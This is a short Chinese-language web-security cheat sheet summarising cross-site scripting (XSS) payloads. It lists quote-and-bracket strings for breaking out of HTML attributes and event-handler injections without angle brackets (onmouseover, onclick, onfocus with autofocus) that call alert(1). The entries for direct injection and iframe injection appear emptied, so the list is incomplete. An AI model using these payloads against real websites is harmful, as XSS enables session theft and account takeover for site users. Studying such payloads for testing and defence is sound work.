[WEB安全]XSS命令总结


一:正常构造方式:

1、无过滤,直接写:

2、正常截断:

"> 
'> 

3、不用<>尖括号:

" onmouseover=alert(1) 空格
' onmouseover=alert(1) 空格
' onclick=alert(1) 空格
" onfocus=alert(1) autofocus="

4、内联框架注入:
">